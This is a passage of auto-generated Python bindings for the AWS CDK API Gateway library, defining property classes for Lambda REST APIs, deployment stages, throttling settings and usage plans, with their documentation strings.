:default: - Based on defaults of ``StageOptions``.
"""
return self._values.get('deploy_options')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of this API Gateway RestApi resource.
default
:default: - No description.
"""
return self._values.get('description')
@property
def domain_name(self) -> typing.Optional["DomainNameOptions"]:
"""Configure a custom domain name and map it to this API.
default
:default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
"""
return self._values.get('domain_name')
@property
def endpoint_export_name(self) -> typing.Optional[str]:
"""Export name for the CfnOutput containing the API endpoint.
default
:default: - when no export name is given, output will be created without export
"""
return self._values.get('endpoint_export_name')
@property
def endpoint_types(self) -> typing.Optional[typing.List["EndpointType"]]:
"""A list of the endpoint types of the API.
Use this property when creating
an API.
default
:default: - No endpoint types.
"""
return self._values.get('endpoint_types')
@property
def fail_on_warnings(self) -> typing.Optional[bool]:
"""Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource.
default
:default: false
"""
return self._values.get('fail_on_warnings')
@property
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API.
When compression is enabled, compression or
decompression is not applied on the payload if the payload size is
smaller than this value. Setting it to zero allows compression for any
payload size.
default
:default: - Compression is disabled.
"""
return self._values.get('minimum_compression_size')
@property
def parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""Custom header parameters for the request.
default
:default: - No parameters.
see
:see: https://docs.aws.amazon.com/cli/latest/reference/apigateway/import-rest-api.html
"""
return self._values.get('parameters')
@property
def policy(self) -> typing.Optional[aws_cdk.aws_iam.PolicyDocument]:
"""A policy document that contains the permissions for this RestApi.
default
:default: - No policy.
"""
return self._values.get('policy')
@property
def rest_api_name(self) -> typing.Optional[str]:
"""A name for the API Gateway RestApi resource.
default
:default: - ID of the RestApi construct.
"""
return self._values.get('rest_api_name')
@property
def retain_deployments(self) -> typing.Optional[bool]:
"""Retains old deployment resources when the API changes.
This allows
manually reverting stages to point to old deployments via the AWS
Console.
default
:default: false
"""
return self._values.get('retain_deployments')
@property
def handler(self) -> aws_cdk.aws_lambda.IFunction:
"""The default Lambda function that handles all requests from this API.
This handler will be used as a the default integration for all methods in
this API, unless specified otherwise in ``addMethod``.
"""
return self._values.get('handler')
@property
def options(self) -> typing.Optional["RestApiProps"]:
"""
default
:default: - no options.
deprecated
:deprecated:
the ``LambdaRestApiProps`` now extends ``RestApiProps``, so all
options are just available here. Note that the options specified in
``options`` will be overridden by any props specified at the root level.
stability
:stability: deprecated
"""
return self._values.get('options')
@property
def proxy(self) -> typing.Optional[bool]:
"""If true, route all requests to the Lambda Function.
If set to false, you will need to explicitly define the API model using
``addResource`` and ``addMethod`` (or ``addProxy``).
default
:default: true
"""
return self._values.get('proxy')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'LambdaRestApiProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class Stage(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Stage"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, deployment: "Deployment", cache_cluster_enabled: typing.Optional[bool]=None, cache_cluster_size: typing.Optional[str]=None, client_certificate_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_options: typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]=None, stage_name: typing.Optional[str]=None, tracing_enabled: typing.Optional[bool]=None, variables: typing.Optional[typing.Mapping[str,str]]=None, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param deployment: The deployment that this stage points to [disable-awslint:ref-via-interface].
:param cache_cluster_enabled: Indicates whether cache clustering is enabled for the stage. Default: - Disabled for the stage.
:param cache_cluster_size: The stage's cache cluster size. Default: 0.5
:param client_certificate_id: The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage. Default: - None.
:param description: A description of the purpose of the stage. Default: - No description.
:param documentation_version: The version identifier of the API documentation snapshot. Default: - No documentation version.
:param method_options: Method deployment options for specific resources/methods. These will override common options defined in ``StageOptions#methodOptions``. Default: - Common options will be used.
:param stage_name: The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI). Default: - "prod"
:param tracing_enabled: Specifies whether Amazon X-Ray tracing is enabled for this method. Default: false
:param variables: A map that defines the stage variables. Variable names must consist of alphanumeric characters, and the values must match the following regular expression: [A-Za-z0-9-._~:/?#&=,]+. Default: - No stage variables.
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
"""
props = StageProps(deployment=deployment, cache_cluster_enabled=cache_cluster_enabled, cache_cluster_size=cache_cluster_size, client_certificate_id=client_certificate_id, description=description, documentation_version=documentation_version, method_options=method_options, stage_name=stage_name, tracing_enabled=tracing_enabled, variables=variables, cache_data_encrypted=cache_data_encrypted, cache_ttl=cache_ttl, caching_enabled=caching_enabled, data_trace_enabled=data_trace_enabled, logging_level=logging_level, metrics_enabled=metrics_enabled, throttling_burst_limit=throttling_burst_limit, throttling_rate_limit=throttling_rate_limit)
jsii.create(Stage, self, [scope, id, props])
@jsii.member(jsii_name="urlForPath")
def url_for_path(self, path: typing.Optional[str]=None) -> str:
"""Returns the invoke URL for a certain path.
:param path: The resource path.
"""
return jsii.invoke(self, "urlForPath", [path])
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "IRestApi":
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "stageName")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.StageOptions", jsii_struct_bases=[MethodDeploymentOptions], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl': 'cacheTtl', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'client_certificate_id': 'clientCertificateId', 'description': 'description', 'documentation_version': 'documentationVersion', 'method_options': 'methodOptions', 'stage_name': 'stageName', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables'})
class StageOptions(MethodDeploymentOptions):
def __init__(self, *, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None, cache_cluster_enabled: typing.Optional[bool]=None, cache_cluster_size: typing.Optional[str]=None, client_certificate_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_options: typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]=None, stage_name: typing.Optional[str]=None, tracing_enabled: typing.Optional[bool]=None, variables: typing.Optional[typing.Mapping[str,str]]=None):
"""
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
:param cache_cluster_enabled: Indicates whether cache clustering is enabled for the stage. Default: - Disabled for the stage.
:param cache_cluster_size: The stage's cache cluster size. Default: 0.5
:param client_certificate_id: The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage. Default: - None.
:param description: A description of the purpose of the stage. Default: - No description.
:param documentation_version: The version identifier of the API documentation snapshot. Default: - No documentation version.
:param method_options: Method deployment options for specific resources/methods. These will override common options defined in ``StageOptions#methodOptions``. Default: - Common options will be used.
:param stage_name: The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI). Default: - "prod"
:param tracing_enabled: Specifies whether Amazon X-Ray tracing is enabled for this method. Default: false
:param variables: A map that defines the stage variables. Variable names must consist of alphanumeric characters, and the values must match the following regular expression: [A-Za-z0-9-._~:/?#&=,]+. Default: - No stage variables.
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl is not None: self._values["cache_ttl"] = cache_ttl
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if method_options is not None: self._values["method_options"] = method_options
if stage_name is not None: self._values["stage_name"] = stage_name
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def cache_data_encrypted(self) -> typing.Optional[bool]:
"""Indicates whether the cached responses are encrypted.
default
:default: false
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Specifies the time to live (TTL), in seconds, for cached responses.
The
higher the TTL, the longer the response will be cached.
default
:default: Duration.minutes(5)
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html
"""
return self._values.get('cache_ttl')
@property
def caching_enabled(self) -> typing.Optional[bool]:
"""Specifies whether responses should be cached and returned for requests.
A
cache cluster must be enabled on the stage for responses to be cached.
default
:default: - Caching is Disabled.
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[bool]:
"""Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: false
"""
return self._values.get('data_trace_enabled')
@property
def logging_level(self) -> typing.Optional["MethodLoggingLevel"]:
"""Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: - Off
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon CloudWatch metrics are enabled for this method.
default
:default: false
"""
return self._values.get('metrics_enabled')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests.
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps).
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_rate_limit')
@property
def cache_cluster_enabled(self) -> typing.Optional[bool]:
"""Indicates whether cache clustering is enabled for the stage.
default
:default: - Disabled for the stage.
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""The stage's cache cluster size.
default
:default: 0.5
"""
return self._values.get('cache_cluster_size')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage.
default
:default: - None.
"""
return self._values.get('client_certificate_id')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the stage.
default
:default: - No description.
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""The version identifier of the API documentation snapshot.
default
:default: - No documentation version.
"""
return self._values.get('documentation_version')
@property
def method_options(self) -> typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]:
"""Method deployment options for specific resources/methods.
These will
override common options defined in ``StageOptions#methodOptions``.
default
:default: - Common options will be used.
"""
return self._values.get('method_options')
@property
def stage_name(self) -> typing.Optional[str]:
"""The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI).
default
:default: - "prod"
"""
return self._values.get('stage_name')
@property
def tracing_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon X-Ray tracing is enabled for this method.
default
:default: false
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map that defines the stage variables.
Variable names must consist of
alphanumeric characters, and the values must match the following regular
expression: [A-Za-z0-9-._~:/?#&=,]+.
default
:default: - No stage variables.
"""
return self._values.get('variables')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.StageProps", jsii_struct_bases=[StageOptions], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl': 'cacheTtl', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'client_certificate_id': 'clientCertificateId', 'description': 'description', 'documentation_version': 'documentationVersion', 'method_options': 'methodOptions', 'stage_name': 'stageName', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables', 'deployment': 'deployment'})
class StageProps(StageOptions):
def __init__(self, *, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None, cache_cluster_enabled: typing.Optional[bool]=None, cache_cluster_size: typing.Optional[str]=None, client_certificate_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_options: typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]=None, stage_name: typing.Optional[str]=None, tracing_enabled: typing.Optional[bool]=None, variables: typing.Optional[typing.Mapping[str,str]]=None, deployment: "Deployment"):
"""
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
:param cache_cluster_enabled: Indicates whether cache clustering is enabled for the stage. Default: - Disabled for the stage.
:param cache_cluster_size: The stage's cache cluster size. Default: 0.5
:param client_certificate_id: The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage. Default: - None.
:param description: A description of the purpose of the stage. Default: - No description.
:param documentation_version: The version identifier of the API documentation snapshot. Default: - No documentation version.
:param method_options: Method deployment options for specific resources/methods. These will override common options defined in ``StageOptions#methodOptions``. Default: - Common options will be used.
:param stage_name: The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI). Default: - "prod"
:param tracing_enabled: Specifies whether Amazon X-Ray tracing is enabled for this method. Default: false
:param variables: A map that defines the stage variables. Variable names must consist of alphanumeric characters, and the values must match the following regular expression: [A-Za-z0-9-._~:/?#&=,]+. Default: - No stage variables.
:param deployment: The deployment that this stage points to [disable-awslint:ref-via-interface].
"""
self._values = {
'deployment': deployment,
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl is not None: self._values["cache_ttl"] = cache_ttl
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if method_options is not None: self._values["method_options"] = method_options
if stage_name is not None: self._values["stage_name"] = stage_name
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def cache_data_encrypted(self) -> typing.Optional[bool]:
"""Indicates whether the cached responses are encrypted.
default
:default: false
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Specifies the time to live (TTL), in seconds, for cached responses.
The
higher the TTL, the longer the response will be cached.
default
:default: Duration.minutes(5)
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html
"""
return self._values.get('cache_ttl')
@property
def caching_enabled(self) -> typing.Optional[bool]:
"""Specifies whether responses should be cached and returned for requests.
A
cache cluster must be enabled on the stage for responses to be cached.
default
:default: - Caching is Disabled.
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[bool]:
"""Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: false
"""
return self._values.get('data_trace_enabled')
@property
def logging_level(self) -> typing.Optional["MethodLoggingLevel"]:
"""Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: - Off
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon CloudWatch metrics are enabled for this method.
default
:default: false
"""
return self._values.get('metrics_enabled')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests.
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps).
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_rate_limit')
@property
def cache_cluster_enabled(self) -> typing.Optional[bool]:
"""Indicates whether cache clustering is enabled for the stage.
default
:default: - Disabled for the stage.
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""The stage's cache cluster size.
default
:default: 0.5
"""
return self._values.get('cache_cluster_size')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage.
default
:default: - None.
"""
return self._values.get('client_certificate_id')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the stage.
default
:default: - No description.
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""The version identifier of the API documentation snapshot.
default
:default: - No documentation version.
"""
return self._values.get('documentation_version')
@property
def method_options(self) -> typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]:
"""Method deployment options for specific resources/methods.
These will
override common options defined in ``StageOptions#methodOptions``.
default
:default: - Common options will be used.
"""
return self._values.get('method_options')
@property
def stage_name(self) -> typing.Optional[str]:
"""The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI).
default
:default: - "prod"
"""
return self._values.get('stage_name')
@property
def tracing_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon X-Ray tracing is enabled for this method.
default
:default: false
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map that defines the stage variables.
Variable names must consist of
alphanumeric characters, and the values must match the following regular
expression: [A-Za-z0-9-._~:/?#&=,]+.
default
:default: - No stage variables.
"""
return self._values.get('variables')
@property
def deployment(self) -> "Deployment":
"""The deployment that this stage points to [disable-awslint:ref-via-interface]."""
return self._values.get('deployment')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ThrottleSettings", jsii_struct_bases=[], name_mapping={'burst_limit': 'burstLimit', 'rate_limit': 'rateLimit'})
class ThrottleSettings():
def __init__(self, *, burst_limit: typing.Optional[jsii.Number]=None, rate_limit: typing.Optional[jsii.Number]=None):
"""Container for defining throttling parameters to API stages or methods.
:param burst_limit: The maximum API request rate limit over a time ranging from one to a few seconds. Default: none
:param rate_limit: The API request steady-state rate limit (average requests per second over an extended period of time). Default: none
link:
:link:: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
self._values = {
}
if burst_limit is not None: self._values["burst_limit"] = burst_limit
if rate_limit is not None: self._values["rate_limit"] = rate_limit
@property
def burst_limit(self) -> typing.Optional[jsii.Number]:
"""The maximum API request rate limit over a time ranging from one to a few seconds.
default
:default: none
"""
return self._values.get('burst_limit')
@property
def rate_limit(self) -> typing.Optional[jsii.Number]:
"""The API request steady-state rate limit (average requests per second over an extended period of time).
default
:default: none
"""
return self._values.get('rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ThrottleSettings(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ThrottlingPerMethod", jsii_struct_bases=[], name_mapping={'method': 'method', 'throttle': 'throttle'})
class ThrottlingPerMethod():
def __init__(self, *, method: "Method", throttle: "ThrottleSettings"):
"""Represents per-method throttling for a resource.
:param method: [disable-awslint:ref-via-interface] The method for which you specify the throttling settings. Default: none
:param throttle: Specifies the overall request rate (average requests per second) and burst capacity. Default: none
"""
if isinstance(throttle, dict): throttle = ThrottleSettings(**throttle)
self._values = {
'method': method,
'throttle': throttle,
}
@property
def method(self) -> "Method":
"""[disable-awslint:ref-via-interface] The method for which you specify the throttling settings.
default
:default: none
"""
return self._values.get('method')
@property
def throttle(self) -> "ThrottleSettings":
"""Specifies the overall request rate (average requests per second) and burst capacity.
default
:default: none
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ThrottlingPerMethod(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class UsagePlan(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.UsagePlan"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key: typing.Optional["IApiKey"]=None, api_stages: typing.Optional[typing.List["UsagePlanPerApiStage"]]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, quota: typing.Optional["QuotaSettings"]=None, throttle: typing.Optional["ThrottleSettings"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api_key: ApiKey to be associated with the usage plan. Default: none
:param api_stages: API Stages to be associated which the usage plan. Default: none
:param description: Represents usage plan purpose. Default: none
:param name: Name for this usage plan. Default: none
:param quota: Number of requests clients can make in a given time period. Default: none
:param throttle: Overall throttle settings for the API. Default: none
"""
props = UsagePlanProps(api_key=api_key, api_stages=api_stages, description=description, name=name, quota=quota, throttle=throttle)
jsii.create(UsagePlan, self, [scope, id, props])
@jsii.member(jsii_name="addApiKey")
def add_api_key(self, api_key: "IApiKey") -> None:
"""Adds an ApiKey.
:param api_key: -
"""
return jsii.invoke(self, "addApiKey", [api_key])
@jsii.member(jsii_name="addApiStage")
def add_api_stage(self, *, api: typing.Optional["IRestApi"]=None, stage: typing.Optional["Stage"]=None, throttle: typing.Optional[typing.List["ThrottlingPerMethod"]]=None) -> None:
"""Adds an apiStage.
:param api_stage: -
:param api: Default: none
:param stage: [disable-awslint:ref-via-interface]. Default: none
:param throttle: Default: none
"""
api_stage = UsagePlanPerApiStage(api=api, stage=stage, throttle=throttle)
return jsii.invoke(self, "addApiStage", [api_stage])
@property
@jsii.member(jsii_name="usagePlanId")
def usage_plan_id(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "usagePlanId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.UsagePlanPerApiStage", jsii_struct_bases=[], name_mapping={'api': 'api', 'stage': 'stage', 'throttle': 'throttle'})
class UsagePlanPerApiStage():
def __init__(self, *, api: typing.Optional["IRestApi"]=None, stage: typing.Optional["Stage"]=None, throttle: typing.Optional[typing.List["ThrottlingPerMethod"]]=None):
"""Represents the API stages that a usage plan applies to.
:param api: Default: none
:param stage: [disable-awslint:ref-via-interface]. Default: none
:param throttle: Default: none
"""
self._values = {
}
if api is not None: self._values["api"] = api
if stage is not None: self._values["stage"] = stage
if throttle is not None: self._values["throttle"] = throttle
@property
def api(self) -> typing.Optional["IRestApi"]:
"""
default
:default: none
"""
return self._values.get('api')
@property
def stage(self) -> typing.Optional["Stage"]:
"""[disable-awslint:ref-via-interface].
default
:default: none
"""
return self._values.get('stage')
@property
def throttle(self) -> typing.Optional[typing.List["ThrottlingPerMethod"]]:
"""
default
:default: none
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'UsagePlanPerApiStage(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.UsagePlanProps", jsii_struct_bases=[], name_mapping={'api_key': 'apiKey', 'api_stages': 'apiStages', 'description': 'description', 'name': 'name', 'quota': 'quota', 'throttle': 'throttle'})
class UsagePlanProps():
def __init__(self, *, api_key: typing.Optional["IApiKey"]=None, api_stages: typing.Optional[typing.List["UsagePlanPerApiStage"]]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, quota: typing.Optional["QuotaSettings"]=None, throttle: typing.Optional["ThrottleSettings"]=None):
"""
:param api_key: ApiKey to be associated with the usage plan. Default: none
:param api_stages: API Stages to be associated which the usage plan. Default: none
:param description: Represents usage plan purpose. Default: none
:param name: Name for this usage plan. Default: none
:param quota: Number of requests clients can make in a given time period. Default: none
